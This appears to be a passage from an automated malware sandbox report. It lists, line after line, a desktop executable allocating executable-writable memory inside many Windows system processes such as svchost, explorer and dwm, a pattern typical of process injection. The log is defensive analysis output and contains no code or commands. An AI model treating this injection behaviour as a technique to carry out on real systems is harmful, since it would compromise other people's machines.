        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2A20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2A30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2570000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2580000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 12D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1320000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 28A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 28B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1160000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1170000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 9D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 9E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: AB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: AC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2210000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2220000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: F80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: F90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2700000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2750000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 10B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 10C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: FA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: FB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: F20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: F70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: D40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: D50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1350000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 13A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 7B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 7C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: B10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: F20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 1A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dwm.exe base: 670000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\sihost.exe base: D30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 400000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 8E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 800000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\explorer.exe base: 82C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: A40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 630000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 170000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 990000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 8A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: F80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: AB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 5A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 580000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\backgroundTaskHost.exe base: BD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: BF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: B20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dllhost.exe base: CE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 600000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 5E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\backgroundTaskHost.exe base: C30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: C50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: B80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dllhost.exe base: D40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: BD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: FC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: F90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 210000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dwm.exe base: 6E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\sihost.exe base: DA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 470000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 950000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 870000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\explorer.exe base: B7B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 360000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: AB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 6A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 1E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: B00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 910000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: FF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 220000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: B20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 610000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 5F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\backgroundTaskHost.exe base: C40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: C60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: B90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dllhost.exe base: D50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: BE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: FD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: FA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 220000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dwm.exe base: 6F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\sihost.exe base: DB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 480000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 960000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 880000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\explorer.exe base: DD50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 370000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: AC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 6B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 1F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: B10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 920000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1000000 protect: page execute and read and writeJump to behavior
